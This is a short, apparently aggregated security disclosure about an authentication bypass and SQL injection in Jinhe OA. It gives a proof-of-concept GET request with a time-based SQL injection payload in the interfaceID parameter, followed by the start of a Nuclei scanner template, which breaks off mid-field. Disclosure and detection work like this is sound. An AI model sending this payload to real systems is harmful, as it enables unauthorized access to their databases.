Authentication Bypass and SQL Injection in Jinhe OA
Authentication Bypass and SQL Injection
Proof of Concept
GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=1;WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
Host: {{Hostname}}
Nuclei Template
id: jinhe-oa-auth-bypass-sqli
info:
name: Jinhe OA Authentication Bypass SQL Injection
author: security-researcher
severity: critical
descriptio ...
Posted on Fri, 08 May 2026 06:44:16 +0000 by Webbyturtle